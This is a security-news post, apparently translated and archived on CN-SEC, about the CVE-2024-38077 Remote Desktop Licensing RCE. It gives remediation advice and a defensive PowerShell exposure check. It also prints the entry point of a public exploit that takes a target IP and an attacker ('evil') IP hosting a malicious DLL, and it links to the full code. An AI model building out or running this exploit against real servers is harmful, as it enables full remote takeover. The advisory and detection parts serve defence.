Windows "nuke-level" RCE vulnerability (CVE-2024-38077)

admin · 2024-08-09 16:55:19 · 119 views · 1,783 characters · reading time 5 min 56 s


Impact:

The vulnerability lies in the Remote Desktop Licensing service (RDL) of Windows Remote Desktop. An attacker needs no preconditions and no user interaction, and can directly obtain the highest privileges on the server and perform arbitrary operations. The vulnerability affects every version from Windows Server 2000 through 2025 and has existed for nearly 30 years.

The vulnerability can be exploited reliably and used for remote control, ransomware, worms and the like; it is extremely destructive, and an attacker needs no privileges whatsoever to achieve remote code execution.

Basic precondition:

Windows Remote Desktop Licensing (RDL) is enabled.

Detection / exploit code:

Only a code fragment is published here; anyone who needs the full code can obtain it from GitHub.

Source: https://github.com/qi4L/CVE-2024-38077/tree/master

import struct, hashlib, argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR
from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, \
    PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Cryptodome.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey

# RPC interface UUID and version of the Remote Desktop Licensing service
UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
# Module-level state shared by the exploit routines (which are not reproduced in this fragment)
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0
BBYTE = UCHAR


if __name__ == '__main__':
    parse = argparse.ArgumentParser(description=DESCRIPTION)
    parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1")
    parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2")
    parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll",
                       help="Evil dll path, eg: \\smb\\evil_dll.dll")
    # action="store_true" instead of type=bool: argparse's bool() treats any
    # non-empty string, including "False", as True
    parse.add_argument("--check_vuln_exist", action="store_true", default=False,
                       help="Check vulnerability exist before exploit")
    args = parse.parse_args()
    # pwn() is defined in the full repository; only this fragment is published here
    pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)


Remediation:
Microsoft has released an official fix for this vulnerability; apply the patch.

Self-check:
Check the system version.
Open "Run", type "winver", click OK, and check whether the displayed system version is one affected by this vulnerability.
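Beyond reading the version in winver, an administrator will want to know whether the precondition above (the Remote Desktop Licensing service enabled) actually holds on a given host and whether the fix is installed. The following PowerShell script is an added example written for this page; it is not from the original post or from the qi4L repository. It assumes the RDL role service is the Server Manager feature RDS-Licensing and the Windows service TermServLicensing, and it uses a placeholder for the KB number, which must be taken from Microsoft's advisory for CVE-2024-38077.

```powershell
# Added example (not from the original post or the qi4L repository): host-side
# exposure check for the Remote Desktop Licensing service discussed above.
# Assumptions: feature name RDS-Licensing, service name TermServLicensing;
# $PatchKb is a placeholder to be replaced with the KB from the MS advisory.

$PatchKb = 'KB<placeholder-from-MS-advisory>'

function Get-RdlExposure {
    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    # Get-WindowsFeature only exists on Windows Server (ServerManager module)
    $feature = $null
    if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
        $feature = Get-WindowsFeature -Name RDS-Licensing -ErrorAction SilentlyContinue
    }

    $svc    = Get-Service -Name TermServLicensing -ErrorAction SilentlyContinue
    $hotfix = Get-HotFix -Id $PatchKb -ErrorAction SilentlyContinue

    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        OSCaption        = $os.Caption
        OSBuild          = $os.BuildNumber
        RoleInstalled    = [bool]($feature -and $feature.Installed)
        ServicePresent   = [bool]$svc
        ServiceStatus    = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
        ServiceStartType = if ($svc) { $svc.StartType.ToString() } else { 'n/a' }
        PatchInstalled   = [bool]$hotfix
        # Exposed: the licensing service is running and the fix is not present
        Exposed          = [bool]($svc -and $svc.Status -eq 'Running' -and -not $hotfix)
    }
}

$result = Get-RdlExposure
$result | Format-List

if ($result.Exposed) {
    Write-Warning "Remote Desktop Licensing is running and $PatchKb is not installed: apply the update, or stop and disable the service if this host does not need to issue RDS licenses."
    # Interim mitigation until the update is applied (requires admin; uncomment to apply):
    # Stop-Service -Name TermServLicensing
    # Set-Service -Name TermServLicensing -StartupType Disabled
}
```

Run it in an elevated PowerShell on each server that has the Remote Desktop Services licensing role. Until the placeholder KB is replaced with the real one, every host with the service running is reported as exposed, which is the conservative default; the role is only needed on the one or two hosts that actually issue RDS CALs, so disabling the service elsewhere removes the precondition entirely.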

Originally published on the WeChat official account 信安王子: Windows "nuke-level" RCE vulnerability (CVE-2024-38077)

Posted by admin on 2024-08-09 16:55:19. Archived on CN-SEC: https://cn-sec.com/archives/3049556.html
